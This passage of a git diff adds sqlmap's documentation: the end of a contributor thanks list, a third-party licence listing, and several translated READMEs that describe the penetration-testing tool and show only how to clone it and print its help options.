suggesting a minor enhancement + +ragos, +* for reporting a minor bug + +rmillet, +* for reporting a bug + +Rub3nCT, +* for reporting a minor bug + +sapra, +* for helping out with Python multiprocessing library on MacOS + +shiftzwei, +* for reporting a couple of bugs + +smith, +* for reporting a minor bug + +Soma Cruz, +* for reporting a minor bug + +Spiros94, +* for contributing a Greek translation of README.md + +Stuffe, +* for reporting a minor bug and a feature request + +Sylphid, +* for suggesting some features + +syssecurity.info, +* for reporting a minor bug + +This LittlePiggy, +* for reporting a minor bug + +ToR, +* for reporting considerable amount of bugs +* for suggesting a feature + +ultramegaman, +* for reporting a minor bug + +Vinicius, +* for reporting a minor bug + +virusdefender +* for contributing WAF scripts safeline.py + +w8ay +* for contributing an implementation for chunked transfer-encoding (switch --chunked) + +wanglei, +* for reporting a minor bug + +warninggp, +* for reporting a few minor bugs + +x, +* for reporting a bug + +zhouhx, +* for contributing a minor patch + +# Organizations + +Black Hat team, +* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation + * Homepage: http://goo.gl/BKfs7 + * Slides: http://goo.gl/Dh65t + * White paper: http://goo.gl/spX3N + +SOURCE Conference team, +* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation + * Homepage: http://goo.gl/IeXV4 + * Slides: http://goo.gl/OKnfj + +AthCon Conference team, +* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation + * Homepage: http://goo.gl/Fs71I + * Slides: http://goo.gl/QMfjO + +Metasploit Framework development team, +* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server + * Homepage: http://www.metasploit.com + +OWASP Board, +* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007 + * Homepage: http://www.owasp.org diff --git a/src/sqlmap-master/doc/THIRD-PARTY.md b/src/sqlmap-master/doc/THIRD-PARTY.md new file mode 100644 index 0000000..76d9e8f --- /dev/null +++ b/src/sqlmap-master/doc/THIRD-PARTY.md @@ -0,0 +1,311 @@ +This file lists bundled packages and their associated licensing terms. + +# BSD + +* The `Ansistrm` library located under `thirdparty/ansistrm/`. + Copyright (C) 2010-2012, Vinay Sajip. +* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`. + Copyright (C) 2004-2010, Leonard Richardson. +* The `ClientForm` library located under `thirdparty/clientform/`. + Copyright (C) 2002-2007, John J. Lee. + Copyright (C) 2005, Gary Poster. + Copyright (C) 2005, Zope Corporation. + Copyright (C) 1998-2000, Gisle Aas. +* The `Colorama` library located under `thirdparty/colorama/`. + Copyright (C) 2013, Jonathan Hartley. +* The `Fcrypt` library located under `thirdparty/fcrypt/`. + Copyright (C) 2000, 2001, 2004 Carey Evans. +* The `PrettyPrint` library located under `thirdparty/prettyprint/`. + Copyright (C) 2010, Chris Hall. +* The `SocksiPy` library located under `thirdparty/socks/`. + Copyright (C) 2006, Dan-Haim. + +```` +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + - Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + - Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + - Neither the name of the nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY +DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +```` + +# LGPL + +* The `Chardet` library located under `thirdparty/chardet/`. + Copyright (C) 2008, Mark Pilgrim. +* The `KeepAlive` library located under `thirdparty/keepalive/`. + Copyright (C) 2002-2003, Michael D. Stenner. +* The `MultipartPost` library located under `thirdparty/multipart/`. + Copyright (C) 2006, Will Holcomb. +* The `icmpsh` tool located under `extra/icmpsh/`. + Copyright (C) 2010, Nico Leidecker, Bernardo Damele. + +```` + GNU LESSER GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + + This version of the GNU Lesser General Public License incorporates +the terms and conditions of version 3 of the GNU General Public +License, supplemented by the additional permissions listed below. + + 0. Additional Definitions. + + As used herein, "this License" refers to version 3 of the GNU Lesser +General Public License, and the "GNU GPL" refers to version 3 of the GNU +General Public License. + + "The Library" refers to a covered work governed by this License, +other than an Application or a Combined Work as defined below. + + An "Application" is any work that makes use of an interface provided +by the Library, but which is not otherwise based on the Library. +Defining a subclass of a class defined by the Library is deemed a mode +of using an interface provided by the Library. + + A "Combined Work" is a work produced by combining or linking an +Application with the Library. The particular version of the Library +with which the Combined Work was made is also called the "Linked +Version". + + The "Minimal Corresponding Source" for a Combined Work means the +Corresponding Source for the Combined Work, excluding any source code +for portions of the Combined Work that, considered in isolation, are +based on the Application, and not on the Linked Version. + + The "Corresponding Application Code" for a Combined Work means the +object code and/or source code for the Application, including any data +and utility programs needed for reproducing the Combined Work from the +Application, but excluding the System Libraries of the Combined Work. + + 1. Exception to Section 3 of the GNU GPL. + + You may convey a covered work under sections 3 and 4 of this License +without being bound by section 3 of the GNU GPL. + + 2. Conveying Modified Versions. + + If you modify a copy of the Library, and, in your modifications, a +facility refers to a function or data to be supplied by an Application +that uses the facility (other than as an argument passed when the +facility is invoked), then you may convey a copy of the modified +version: + + a) under this License, provided that you make a good faith effort to + ensure that, in the event an Application does not supply the + function or data, the facility still operates, and performs + whatever part of its purpose remains meaningful, or + + b) under the GNU GPL, with none of the additional permissions of + this License applicable to that copy. + + 3. Object Code Incorporating Material from Library Header Files. + + The object code form of an Application may incorporate material from +a header file that is part of the Library. You may convey such object +code under terms of your choice, provided that, if the incorporated +material is not limited to numerical parameters, data structure +layouts and accessors, or small macros, inline functions and templates +(ten or fewer lines in length), you do both of the following: + + a) Give prominent notice with each copy of the object code that the + Library is used in it and that the Library and its use are + covered by this License. + + b) Accompany the object code with a copy of the GNU GPL and this license + document. + + 4. Combined Works. + + You may convey a Combined Work under terms of your choice that, +taken together, effectively do not restrict modification of the +portions of the Library contained in the Combined Work and reverse +engineering for debugging such modifications, if you also do each of +the following: + + a) Give prominent notice with each copy of the Combined Work that + the Library is used in it and that the Library and its use are + covered by this License. + + b) Accompany the Combined Work with a copy of the GNU GPL and this license + document. + + c) For a Combined Work that displays copyright notices during + execution, include the copyright notice for the Library among + these notices, as well as a reference directing the user to the + copies of the GNU GPL and this license document. + + d) Do one of the following: + + 0) Convey the Minimal Corresponding Source under the terms of this + License, and the Corresponding Application Code in a form + suitable for, and under terms that permit, the user to + recombine or relink the Application with a modified version of + the Linked Version to produce a modified Combined Work, in the + manner specified by section 6 of the GNU GPL for conveying + Corresponding Source. + + 1) Use a suitable shared library mechanism for linking with the + Library. A suitable mechanism is one that (a) uses at run time + a copy of the Library already present on the user's computer + system, and (b) will operate properly with a modified version + of the Library that is interface-compatible with the Linked + Version. + + e) Provide Installation Information, but only if you would otherwise + be required to provide such information under section 6 of the + GNU GPL, and only to the extent that such information is + necessary to install and execute a modified version of the + Combined Work produced by recombining or relinking the + Application with a modified version of the Linked Version. (If + you use option 4d0, the Installation Information must accompany + the Minimal Corresponding Source and Corresponding Application + Code. If you use option 4d1, you must provide the Installation + Information in the manner specified by section 6 of the GNU GPL + for conveying Corresponding Source.) + + 5. Combined Libraries. + + You may place library facilities that are a work based on the +Library side by side in a single library together with other library +facilities that are not Applications and are not covered by this +License, and convey such a combined library under terms of your +choice, if you do both of the following: + + a) Accompany the combined library with a copy of the same work based + on the Library, uncombined with any other library facilities, + conveyed under the terms of this License. + + b) Give prominent notice with the combined library that part of it + is a work based on the Library, and explaining where to find the + accompanying uncombined form of the same work. + + 6. Revised Versions of the GNU Lesser General Public License. + + The Free Software Foundation may publish revised and/or new versions +of the GNU Lesser General Public License from time to time. Such new +versions will be similar in spirit to the present version, but may +differ in detail to address new problems or concerns. + + Each version is given a distinguishing version number. If the +Library as you received it specifies that a certain numbered version +of the GNU Lesser General Public License "or any later version" +applies to it, you have the option of following the terms and +conditions either of that published version or of any later version +published by the Free Software Foundation. If the Library as you +received it does not specify a version number of the GNU Lesser +General Public License, you may choose any version of the GNU Lesser +General Public License ever published by the Free Software Foundation. + + If the Library as you received it specifies that a proxy can decide +whether future versions of the GNU Lesser General Public License shall +apply, that proxy's public statement of acceptance of any version is +permanent authorization for you to choose that version for the +Library. +```` + +# PSF + +* The `Magic` library located under `thirdparty/magic/`. + Copyright (C) 2011, Adam Hupp. + +```` +PSF LICENSE AGREEMENT FOR PYTHON 2.7.3 + +This LICENSE AGREEMENT is between the Python Software Foundation (“PSF”), +and the Individual or Organization (“Licensee”) accessing and otherwise +using Python 2.7.3 software in source or binary form and its associated +documentation. +Subject to the terms and conditions of this License Agreement, PSF hereby +grants Licensee a nonexclusive, royalty-free, world-wide license to +reproduce, analyze, test, perform and/or display publicly, prepare +derivative works, distribute, and otherwise use Python 2.7.3 alone or in any +derivative version, provided, however, that PSF’s License Agreement and +PSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software +Foundation; All Rights Reserved” are retained in Python 2.7.3 alone or in +any derivative version prepared by Licensee. +In the event Licensee prepares a derivative work that is based on or +incorporates Python 2.7.3 or any part thereof, and wants to make the +derivative work available to others as provided herein, then Licensee hereby +agrees to include in any such work a brief summary of the changes made to +Python 2.7.3. +PSF is making Python 2.7.3 available to Licensee on an “AS IS” basis. PSF +MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF +EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION +OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT +THE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS. +PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR +ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF +MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE +THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. +This License Agreement will automatically terminate upon a material breach +of its terms and conditions. +Nothing in this License Agreement shall be deemed to create any relationship +of agency, partnership, or joint venture between PSF and Licensee. This +License Agreement does not grant permission to use PSF trademarks or trade +name in a trademark sense to endorse or promote products or services of +Licensee, or any third party. +By copying, installing or otherwise using Python 2.7.3, Licensee agrees to +be bound by the terms and conditions of this License Agreement. +```` + +# MIT + +* The `bottle` web framework library located under `thirdparty/bottle/`. + Copyright (C) 2012, Marcel Hellkamp. +* The `identYwaf` library located under `thirdparty/identywaf/`. + Copyright (C) 2019-2020, Miroslav Stampar. +* The `ordereddict` library located under `thirdparty/odict/`. + Copyright (C) 2009, Raymond Hettinger. +* The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`. + Copyright (C) 2010-2018, Benjamin Peterson. +* The `Termcolor` library located under `thirdparty/termcolor/`. + Copyright (C) 2008-2011, Volvox Development Team. + +```` +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +"Software"), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE +LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION +OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION +WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +```` + +# Public domain + +* The `PyDes` library located under `thirdparty/pydes/`. + Copyleft 2009, Todd Whiteman. +* The `win_inet_pton` library located under `thirdparty/wininetpton/`. + Copyleft 2014, Ryan Vennell. diff --git a/src/sqlmap-master/doc/translations/README-bg-BG.md b/src/sqlmap-master/doc/translations/README-bg-BG.md new file mode 100644 index 0000000..77c87d5 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-bg-BG.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система. + +Демо снимки +---- + +![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Можете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои функции, качени на wiki. + +Инсталиране +---- + +Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master). + +За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работи самостоятелно с [Python](https://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи. + +Използване +---- + +За да получите списък с основните опции използвайте: + + python sqlmap.py -h + +За да получите списък с всички опции използвайте: + + python sqlmap.py -hh + +Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601). +За да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Връзки +---- + +* Начална страница: https://sqlmap.org +* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues +* Упътване: https://github.com/sqlmapproject/sqlmap/wiki +* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-ckb-KU.md b/src/sqlmap-master/doc/translations/README-ckb-KU.md new file mode 100644 index 0000000..f84d93f --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-ckb-KU.md @@ -0,0 +1,67 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + + +
+ + + +بەرنامەی `sqlmap` بەرنامەیەکی تاقیکردنەوەی چوونە ژوورەوەی سەرچاوە کراوەیە کە بە شێوەیەکی ئۆتۆماتیکی بنکەدراوە کە کێشەی ئاسایشی SQL Injection یان هەیە دەدۆزێتەوە. ئەم بەرنامەیە بزوێنەرێکی بەهێزی دیاریکردنی تێدایە. هەروەها کۆمەڵێک سکریپتی بەرفراوانی هەیە کە ئاسانکاری دەکات بۆ پیشەییەکانی تاقیکردنەوەی دزەکردن(penetration tester) بۆ کارکردن لەگەڵ بنکەدراوە. لە کۆکردنەوەی زانیاری دەربارەی بانکی داتا تا دەستگەیشتن بە داتاکانی سیستەم و جێبەجێکردنی فەرمانەکان لە ڕێگەی پەیوەندی Out Of Band لە سیستەمی کارگێڕدا. + + +سکرین شاتی ئامرازەکە +---- + + +
+ + + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +
+ +بۆ بینینی [کۆمەڵێک سکرین شات و سکریپت](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) دەتوانیت سەردانی ویکیەکە بکەیت. + + +دامەزراندن +---- + +بۆ دابەزاندنی نوێترین وەشانی tarball، کلیک [لێرە](https://github.com/sqlmapproject/sqlmap/tarball/master) یان دابەزاندنی نوێترین وەشانی zipball بە کلیککردن لەسەر [لێرە](https://github.com/sqlmapproject/sqlmap/zipball/master) دەتوانیت ئەم کارە بکەیت. + +باشترە بتوانیت sqlmap دابەزێنیت بە کلۆنکردنی کۆگای [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap لە دەرەوەی سندوق کاردەکات لەگەڵ [Python](https://www.python.org/download/) وەشانی **2.6**، **2.7** و **3.x** لەسەر هەر پلاتفۆرمێک. + +چۆنیەتی بەکارهێنان +---- + +بۆ بەدەستهێنانی لیستی بژاردە سەرەتاییەکان و سویچەکان ئەمانە بەکاربهێنە: + + python sqlmap.py -h + +بۆ بەدەستهێنانی لیستی هەموو بژاردە و سویچەکان ئەمە بەکار بێنا: + + python sqlmap.py -hh + +دەتوانن نمونەی ڕانکردنێک بدۆزنەوە [لێرە](https://asciinema.org/a/46601). +بۆ بەدەستهێنانی تێڕوانینێکی گشتی لە تواناکانی sqlmap، لیستی تایبەتمەندییە پشتگیریکراوەکان، و وەسفکردنی هەموو هەڵبژاردن و سویچەکان، لەگەڵ نموونەکان، ئامۆژگاریت دەکرێت کە ڕاوێژ بە [دەستنووسی بەکارهێنەر](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +بەستەرەکان +---- + +* ماڵپەڕی سەرەکی: https://sqlmap.org +* داگرتن: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یان [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* فیدی RSS جێبەجێ دەکات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* شوێنپێهەڵگری کێشەکان: https://github.com/sqlmapproject/sqlmap/issues +* ڕێنمایی بەکارهێنەر: https://github.com/sqlmapproject/sqlmap/wiki +* پرسیارە زۆرەکان (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* دیمۆ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* وێنەی شاشە: https://github.com/sqlmapproject/sqlmap/wiki/وێنەی شاشە + +وەرگێڕانەکان diff --git a/src/sqlmap-master/doc/translations/README-de-DE.md b/src/sqlmap-master/doc/translations/README-de-DE.md new file mode 100644 index 0000000..2c4df73 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-de-DE.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen. + +Screenshots +--- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Du kannst eine [Sammlung von Screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), die einige der Funktionen demonstrieren, auf dem Wiki einsehen. + +Installation +--- + +[Hier](https://github.com/sqlmapproject/sqlmap/tarball/master) kannst du das neueste TAR-Archiv herunterladen und [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) das neueste ZIP-Archiv. + +Vorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.com/sqlmapproject/sqlmap) Repository klonst: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. + +Benutzung +--- + +Um eine Liste aller grundsätzlichen Optionen und Switches zu bekommen, nutze diesen Befehl: + + python sqlmap.py -h + +Um eine Liste alles Optionen und Switches zu bekommen, nutze diesen Befehl: + + python sqlmap.py -hh + +Ein Probelauf ist [hier](https://asciinema.org/a/46601) zu finden. Um einen Überblick über sqlmap's Fähigkeiten, unterstütze Funktionen und eine Erklärung aller Optionen und Switches, zusammen mit Beispielen, zu erhalten, wird das [Benutzerhandbuch](https://github.com/sqlmapproject/sqlmap/wiki/Usage) empfohlen. + +Links +--- + +* Webseite: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues +* Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki +* Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-es-MX.md b/src/sqlmap-master/doc/translations/README-es-MX.md new file mode 100644 index 0000000..3b07133 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-es-MX.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". + +Capturas de Pantalla +--- +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki). + +Instalación +--- + +Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma. + +Uso +--- + +Para obtener una lista de opciones básicas: + + python sqlmap.py -h + +Para obtener una lista de todas las opciones: + + python sqlmap.py -hh + +Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601). +Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Enlaces +--- + +* Página principal: https://sqlmap.org +* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues +* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki +* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-fa-IR.md b/src/sqlmap-master/doc/translations/README-fa-IR.md new file mode 100644 index 0000000..baff855 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-fa-IR.md @@ -0,0 +1,84 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + + +
+ + + +برنامه `sqlmap`، یک برنامه‌ی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر می‌کند. + + +تصویر محیط ابزار +---- + + +
+ + + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +
+ +برای نمایش [مجموعه ای از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از دانشنامه دیدن کنید. + + +نصب +---- + +برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید. + + +نحوه استفاده +---- + + +برای دریافت لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید: + + + +
